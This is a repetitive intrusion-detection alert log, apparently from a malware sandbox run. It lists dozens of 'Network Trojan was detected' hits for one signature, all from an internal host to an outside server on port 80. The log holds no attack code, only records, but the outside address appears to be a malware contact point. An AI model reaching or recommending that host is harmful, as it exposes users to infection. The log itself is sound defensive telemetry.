                            Timestamp:192.168.2.462.204.41.450113802027700 02/08/23-17:39:23.761965
                            SID:2027700
                            Source Port:50113
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450071802027700 02/08/23-17:39:13.540692
                            SID:2027700
                            Source Port:50071
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449707802027700 02/08/23-17:37:27.346126
                            SID:2027700
                            Source Port:49707
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449748802027700 02/08/23-17:37:39.760373
                            SID:2027700
                            Source Port:49748
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449789802027700 02/08/23-17:37:49.576297
                            SID:2027700
                            Source Port:49789
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450030802027700 02/08/23-17:39:03.558067
                            SID:2027700
                            Source Port:50030
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450091802027700 02/08/23-17:39:18.399399
                            SID:2027700
                            Source Port:50091
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450097802027700 02/08/23-17:39:19.882191
                            SID:2027700
                            Source Port:50097
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449708802027700 02/08/23-17:37:27.587074
                            SID:2027700
                            Source Port:49708
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450229802027700 02/08/23-17:39:54.430750
                            SID:2027700
                            Source Port:50229
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450284802027700 02/08/23-17:40:07.872773
                            SID:2027700
                            Source Port:50284
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450327802027700 02/08/23-17:40:20.585581
                            SID:2027700
                            Source Port:50327
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449806802027700 02/08/23-17:37:56.011816
                            SID:2027700
                            Source Port:49806
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450318802027700 02/08/23-17:40:18.404661
                            SID:2027700
                            Source Port:50318
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450195802027700 02/08/23-17:39:46.232146
                            SID:2027700
                            Source Port:50195
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449800802027700 02/08/23-17:37:54.558247
                            SID:2027700
                            Source Port:49800
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450330802027700 02/08/23-17:40:21.380451
                            SID:2027700
                            Source Port:50330
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449711802027700 02/08/23-17:37:28.358986
                            SID:2027700
                            Source Port:49711
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449904802027700 02/08/23-17:38:25.945307
                            SID:2027700
                            Source Port:49904
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449965802027700 02/08/23-17:38:45.617119
                            SID:2027700
                            Source Port:49965
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449993802027700 02/08/23-17:38:54.619810
                            SID:2027700
                            Source Port:49993
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450158802027700 02/08/23-17:39:34.968887
                            SID:2027700
                            Source Port:50158
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449895802027700 02/08/23-17:38:23.802202
                            SID:2027700
                            Source Port:49895
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449730802027700 02/08/23-17:37:35.325343
                            SID:2027700
                            Source Port:49730
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450063802027700 02/08/23-17:39:11.637718
                            SID:2027700
                            Source Port:50063
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449984802027700 02/08/23-17:38:51.388411
                            SID:2027700
                            Source Port:49984
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450161802027700 02/08/23-17:39:35.717280
                            SID:2027700
                            Source Port:50161
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450069802027700 02/08/23-17:39:13.057358
                            SID:2027700
                            Source Port:50069
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450167802027700 02/08/23-17:39:37.216091
                            SID:2027700
                            Source Port:50167
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450002802027700 02/08/23-17:38:56.743696
                            SID:2027700
                            Source Port:50002
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450256802027700 02/08/23-17:40:01.011214
                            SID:2027700
                            Source Port:50256
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450170802027700 02/08/23-17:39:37.964961
                            SID:2027700
                            Source Port:50170
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449894802027700 02/08/23-17:38:23.560699
                            SID:2027700
                            Source Port:49894
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449923802027700 02/08/23-17:38:30.522432
                            SID:2027700
                            Source Port:49923
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449764802027700 02/08/23-17:37:43.558405
                            SID:2027700
                            Source Port:49764
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449768802027700 02/08/23-17:37:44.560979
                            SID:2027700
                            Source Port:49768
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449698802027700 02/08/23-17:37:25.130950
                            SID:2027700
                            Source Port:49698
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449727802027700 02/08/23-17:37:34.234315
                            SID:2027700
                            Source Port:49727
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449964802027700 02/08/23-17:38:45.382357
                            SID:2027700
                            Source Port:49964
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450139802027700 02/08/23-17:39:30.435909
                            SID:2027700
                            Source Port:50139
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449710802027700 02/08/23-17:37:28.056201
                            SID:2027700
                            Source Port:49710
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449834802027700 02/08/23-17:38:03.045302
                            SID:2027700
                            Source Port:49834
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450044802027700 02/08/23-17:39:06.968443
                            SID:2027700
                            Source Port:50044
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450298802027700 02/08/23-17:40:11.262830
                            SID:2027700
                            Source Port:50298
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450003802027700 02/08/23-17:38:56.978357
                            SID:2027700
                            Source Port:50003
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449875802027700 02/08/23-17:38:18.930672
                            SID:2027700
                            Source Port:49875
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450133802027700 02/08/23-17:39:28.968381
                            SID:2027700
                            Source Port:50133
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450257802027700 02/08/23-17:40:01.251489
                            SID:2027700
                            Source Port:50257
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450228802027700 02/08/23-17:39:54.186332
                            SID:2027700
                            Source Port:50228
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450240802027700 02/08/23-17:39:57.100034
                            SID:2027700
                            Source Port:50240
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450186802027700 02/08/23-17:39:44.122140
                            SID:2027700
                            Source Port:50186
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450050802027700 02/08/23-17:39:08.417524
                            SID:2027700
                            Source Port:50050
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449780802027700 02/08/23-17:37:47.419949
                            SID:2027700
                            Source Port:49780
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449783802027700 02/08/23-17:37:48.137742
                            SID:2027700
                            Source Port:49783
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449749802027700 02/08/23-17:37:39.995475
                            SID:2027700
                            Source Port:49749
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449936802027700 02/08/23-17:38:35.483540
                            SID:2027700
                            Source Port:49936
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449838802027700 02/08/23-17:38:06.998531
                            SID:2027700
                            Source Port:49838
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450028802027700 02/08/23-17:39:03.062795
                            SID:2027700
                            Source Port:50028
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449755802027700 02/08/23-17:37:41.418676
                            SID:2027700
                            Source Port:49755
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449853802027700 02/08/23-17:38:11.209207
                            SID:2027700
                            Source Port:49853
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450212802027700 02/08/23-17:39:50.310671
                            SID:2027700
                            Source Port:50212
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450285802027700 02/08/23-17:40:08.115127
                            SID:2027700
                            Source Port:50285
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449847802027700 02/08/23-17:38:09.522560
                            SID:2027700
                            Source Port:49847
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450120802027700 02/08/23-17:39:25.768549
                            SID:2027700
                            Source Port:50120
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450203802027700 02/08/23-17:39:48.140900
                            SID:2027700
                            Source Port:50203
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450301802027700 02/08/23-17:40:11.986986
                            SID:2027700
                            Source Port:50301
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450019802027700 02/08/23-17:39:00.869717
                            SID:2027700
                            Source Port:50019
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450031802027700 02/08/23-17:39:03.810410
                            SID:2027700
                            Source Port:50031
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450114802027700 02/08/23-17:39:23.997916
                            SID:2027700
                            Source Port:50114
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450199802027700 02/08/23-17:39:47.192794
                            SID:2027700
                            Source Port:50199
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450117802027700 02/08/23-17:39:24.763181
                            SID:2027700
                            Source Port:50117
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449819802027700 02/08/23-17:37:59.122996
                            SID:2027700
                            Source Port:49819
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449908802027700 02/08/23-17:38:26.928554
                            SID:2027700
                            Source Port:49908
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449949802027700 02/08/23-17:38:38.632550
                            SID:2027700
                            Source Port:49949
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450072802027700 02/08/23-17:39:13.789124
                            SID:2027700
                            Source Port:50072
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449825802027700 02/08/23-17:38:00.530244
                            SID:2027700
                            Source Port:49825
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449920802027700 02/08/23-17:38:29.819519
                            SID:2027700
                            Source Port:49920
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449796802027700 02/08/23-17:37:52.334940
                            SID:2027700
                            Source Port:49796
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449850802027700 02/08/23-17:38:10.307889
                            SID:2027700
                            Source Port:49850
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450231802027700 02/08/23-17:39:54.903522
                            SID:2027700
                            Source Port:50231
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449777802027700 02/08/23-17:37:46.698035
                            SID:2027700
                            Source Port:49777
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449866802027700 02/08/23-17:38:16.739355
                            SID:2027700
                            Source Port:49866
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450101802027700 02/08/23-17:39:20.831047
                            SID:2027700
                            Source Port:50101
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449736802027700 02/08/23-17:37:36.780328
                            SID:2027700
                            Source Port:49736
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449980802027700 02/08/23-17:38:49.476222
                            SID:2027700
                            Source Port:49980
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450272802027700 02/08/23-17:40:04.969177
                            SID:2027700
                            Source Port:50272
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450088802027700 02/08/23-17:39:17.657424
                            SID:2027700
                            Source Port:50088
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450314802027700 02/08/23-17:40:17.451507
                            SID:2027700
                            Source Port:50314
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450142802027700 02/08/23-17:39:31.136437
                            SID:2027700
                            Source Port:50142
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450183802027700 02/08/23-17:39:43.402506
                            SID:2027700
                            Source Port:50183
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450047802027700 02/08/23-17:39:07.710715
                            SID:2027700
                            Source Port:50047
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449760802027700 02/08/23-17:37:42.602798
                            SID:2027700
                            Source Port:49760
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450122802027700 02/08/23-17:39:26.248693
                            SID:2027700
                            Source Port:50122
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450039802027700 02/08/23-17:39:05.758232
                            SID:2027700
                            Source Port:50039
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450235802027700 02/08/23-17:39:55.857099
                            SID:2027700
                            Source Port:50235
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450278802027700 02/08/23-17:40:06.451503
                            SID:2027700
                            Source Port:50278
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450217802027700 02/08/23-17:39:51.538233
                            SID:2027700
                            Source Port:50217
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450140802027700 02/08/23-17:39:30.667124
                            SID:2027700
                            Source Port:50140
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450296802027700 02/08/23-17:40:10.763882
                            SID:2027700
                            Source Port:50296
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449910802027700 02/08/23-17:38:27.414676
                            SID:2027700
                            Source Port:49910
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449742802027700 02/08/23-17:37:38.312283
                            SID:2027700
                            Source Port:49742
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449968802027700 02/08/23-17:38:46.334914
                            SID:2027700
                            Source Port:49968
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450057802027700 02/08/23-17:39:10.183850
                            SID:2027700
                            Source Port:50057
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449732802027700 02/08/23-17:37:35.795795
                            SID:2027700
                            Source Port:49732
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449888802027700 02/08/23-17:38:22.112698
                            SID:2027700
                            Source Port:49888
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449809802027700 02/08/23-17:37:56.735328
                            SID:2027700
                            Source Port:49809
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449827802027700 02/08/23-17:38:01.010259
                            SID:2027700
                            Source Port:49827
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449883802027700 02/08/23-17:38:20.884072
                            SID:2027700
                            Source Port:49883
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449845802027700 02/08/23-17:38:08.786241
                            SID:2027700
                            Source Port:49845
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450173802027700 02/08/23-17:39:38.673124
                            SID:2027700
                            Source Port:50173
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450049802027700 02/08/23-17:39:08.183040
                            SID:2027700
                            Source Port:50049
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450150802027700 02/08/23-17:39:33.073470
                            SID:2027700
                            Source Port:50150
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449822802027700 02/08/23-17:37:59.825964
                            SID:2027700
                            Source Port:49822
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450227802027700 02/08/23-17:39:53.949663
                            SID:2027700
                            Source Port:50227
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450286802027700 02/08/23-17:40:08.361527
                            SID:2027700
                            Source Port:50286
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449770802027700 02/08/23-17:37:45.036009
                            SID:2027700
                            Source Port:49770
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450268802027700 02/08/23-17:40:03.929437
                            SID:2027700
                            Source Port:50268
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450245802027700 02/08/23-17:39:58.312452
                            SID:2027700
                            Source Port:50245
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449900802027700 02/08/23-17:38:24.979265
                            SID:2027700
                            Source Port:49900
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450104802027700 02/08/23-17:39:21.557053
                            SID:2027700
                            Source Port:50104
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449704802027700 02/08/23-17:37:26.622936
                            SID:2027700
                            Source Port:49704
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450067802027700 02/08/23-17:39:12.587874
                            SID:2027700
                            Source Port:50067
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449817802027700 02/08/23-17:37:58.632623
                            SID:2027700
                            Source Port:49817
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450263802027700 02/08/23-17:40:02.709618
                            SID:2027700
                            Source Port:50263
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450085802027700 02/08/23-17:39:16.942706
                            SID:2027700
                            Source Port:50085
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450145802027700 02/08/23-17:39:31.864006
                            SID:2027700
                            Source Port:50145
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449722802027700 02/08/23-17:37:31.299531
                            SID:2027700
                            Source Port:49722
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450300802027700 02/08/23-17:40:11.733230
                            SID:2027700
                            Source Port:50300
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450323802027700 02/08/23-17:40:19.611218
                            SID:2027700
                            Source Port:50323
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449697802027700 02/08/23-17:37:24.898911
                            SID:2027700
                            Source Port:49697
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449835802027700 02/08/23-17:38:03.284886
                            SID:2027700
                            Source Port:49835
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449832802027700 02/08/23-17:38:02.498158
                            SID:2027700
                            Source Port:49832
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450163802027700 02/08/23-17:39:36.189853
                            SID:2027700
                            Source Port:50163
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450059802027700 02/08/23-17:39:10.667915
                            SID:2027700
                            Source Port:50059
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450102802027700 02/08/23-17:39:21.074270
                            SID:2027700
                            Source Port:50102
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450273802027700 02/08/23-17:40:05.210080
                            SID:2027700
                            Source Port:50273
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450310802027700 02/08/23-17:40:15.001847
                            SID:2027700
                            Source Port:50310
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450313802027700 02/08/23-17:40:16.587698
                            SID:2027700
                            Source Port:50313
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449860802027700 02/08/23-17:38:15.268343
                            SID:2027700
                            Source Port:49860
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450095802027700 02/08/23-17:39:19.370464
                            SID:2027700
                            Source Port:50095
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450276802027700 02/08/23-17:40:05.953011
                            SID:2027700
                            Source Port:50276
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449865802027700 02/08/23-17:38:16.496280
                            SID:2027700
                            Source Port:49865
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450209802027700 02/08/23-17:39:49.582809
                            SID:2027700
                            Source Port:50209
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449804802027700 02/08/23-17:37:55.542967
                            SID:2027700
                            Source Port:49804
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450098802027700 02/08/23-17:39:20.119029
                            SID:2027700
                            Source Port:50098
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450132802027700 02/08/23-17:39:28.720657
                            SID:2027700
                            Source Port:50132
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450016802027700 02/08/23-17:39:00.164305
                            SID:2027700
                            Source Port:50016
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449978802027700 02/08/23-17:38:48.712592
                            SID:2027700
                            Source Port:49978
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449773802027700 02/08/23-17:37:45.744566
                            SID:2027700
                            Source Port:49773
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.449937802027700 02/08/23-17:38:35.731319
                            SID:2027700
                            Source Port:49937
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450248802027700 02/08/23-17:39:59.059890
                            SID:2027700
                            Source Port:50248
                            Destination Port:80
                            Protocol:TCP
                            Classtype:A Network Trojan was detected
                            Timestamp:192.168.2.462.204.41.450265802027700 02/08/23-17:40:03.200849
                            SID:2027700
